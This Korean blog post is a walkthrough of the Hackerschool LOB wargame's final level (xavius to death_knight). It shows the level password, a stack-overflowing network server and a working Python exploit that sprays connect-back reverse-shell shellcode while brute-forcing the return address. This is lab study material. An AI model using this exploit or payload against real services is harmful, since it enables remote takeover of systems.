해커스쿨 LOB LEVEL20 [xavius -> death_knight] 풀이
M4ndU
해커스쿨 LOB [xavius -> death_knight] 풀이입니다.
ID | xavius
PW | throw me away
으로 로그인합니다.
\xff 를 \x00으로 인식하는 오류를 피해 bash2를 사용합니다.
$ bash2
그리고
$ ls -l
를 이용해 어떤 파일과 어떤 폴더가 있는지 확인하고,
$ cat [문제이름].c
를 이용해 소스코드를 확인합시다.
login: xavius
Password:
[xavius@localhost xavius]$ bash2
[xavius@localhost xavius]$ ls -l
total 20
-rwsr-sr-x 1 death_kn death_kn 14134 Mar 30 2010 death_knight
-rw-r--r-- 1 root root 1409 Mar 30 2010 death_knight.c
[xavius@localhost xavius]$ cat death_knight.c
/*
The Lord of the BOF : The Fellowship of the BOF
- dark knight
- remote BOF
*/
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <dumpcode.h>
main()
{
char buffer[40];
int server_fd, client_fd;
struct sockaddr_in server_addr;
struct sockaddr_in client_addr;
int sin_size;
if((server_fd = socket(AF_INET, SOCK_STREAM, 0)) == -1){
perror("socket");
exit(1);
}
server_addr.sin_family = AF_INET;
server_addr.sin_port = htons(6666);
server_addr.sin_addr.s_addr = INADDR_ANY;
bzero(&(server_addr.sin_zero), 8);
if(bind(server_fd, (struct sockaddr *)&server_addr, sizeof(struct sockaddr)) == -1){
perror("bind");
exit(1);
}
if(listen(server_fd, 10) == -1){
perror("listen");
exit(1);
}
while(1) {
sin_size = sizeof(struct sockaddr_in);
if((client_fd = accept(server_fd, (struct sockaddr *)&client_addr, &sin_size)) == -1){
perror("accept");
continue;
}
if (!fork()){
send(client_fd, "Death Knight : Not even death can save you from me!\n", 52, 0);
send(client_fd, "You : ", 6, 0);
recv(client_fd, buffer, 256, 0);
close(client_fd);
break;
}
close(client_fd);
while(waitpid(-1,NULL,WNOHANG) > 0);
}
close(server_fd);
}
드디어 LOB 마지막 이네요.
소스를 보니 원격으로 쉘을 따야 하는 것 같네요.
buffer의 위치를 확인하겠습니다.
...
0x8048a02 <main+318>: add %esp,16
0x8048a05 <main+321>: push 0
0x8048a07 <main+323>: push 0x100
0x8048a0c <main+328>: lea %eax,[%ebp-40]
0x8048a0f <main+331>: push %eax
0x8048a10 <main+332>: mov %eax,DWORD PTR [%ebp-48]
0x8048a13 <main+335>: push %eax
0x8048a14 <main+336>: call 0x804860c <recv>
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 | from socket import * from struct import * p = lambda x : pack("<L", x) up = lambda x : unpack("<L", x)[0] IPADDR = "\xc0\xa8\x1f\x01" PORT = "\xc7\x38" shellcode = ( "\x31\xc0\x31\xdb\x31\xc9\x31\xd2" "\xb0\x66\xb3\x01\x51\x6a\x06\x6a" "\x01\x6a\x02\x89\xe1\xcd\x80\x89" "\xc6\xb0\x66\x31\xdb\xb3\x02\x68" +IPADDR+"\x66\x68"+PORT+"\x66\x53\xfe" "\xc3\x89\xe1\x6a\x10\x51\x56\x89" "\xe1\xcd\x80\x31\xc9\xb1\x03\xfe" "\xc9\xb0\x3f\xcd\x80\x75\xf8\x31" "\xc0\x52\x68\x6e\x2f\x73\x68\x68" "\x2f\x2f\x62\x69\x89\xe3\x52\x53" "\x89\xe1\x52\x89\xe2\xb0\x0b\xcd" "\x80" ) for i in range(0xFF, 0x00, -1): for j in range(0xFF, 0x00, -1): payload="A"*44+chr(j)+chr(i)+"\xff\xbf"+"\x90"*80+shellcode print "addr : " + str(hex(up(chr(j)+chr(i)+"\xff\xbf"))) s=socket(AF_INET, SOCK_STREAM) s.connect(("192.168.31.129", 6666)) s.recv(52) s.recv(6) s.send(payload) s.close() | cs |
'System Hacking > LOB Redhat' 카테고리의 다른 글
| 해커스쿨 LOB LEVEL19 [nightmare -> xavius] 풀이 (0) | 2018.02.15 |
|---|---|
| 해커스쿨 LOB LEVEL18 [succubus -> nightmare] 풀이 (4) | 2018.02.14 |
| 해커스쿨 LOB LEVEL17 [zombie_assassin -> succubus] 풀이 (0) | 2018.02.14 |
| 해커스쿨 LOB LEVEL16 [assassin -> zombie_assassin] 풀이 (0) | 2018.02.13 |
| 해커스쿨 LOB LEVEL15 [giant -> assassin] 풀이 (0) | 2018.02.13 |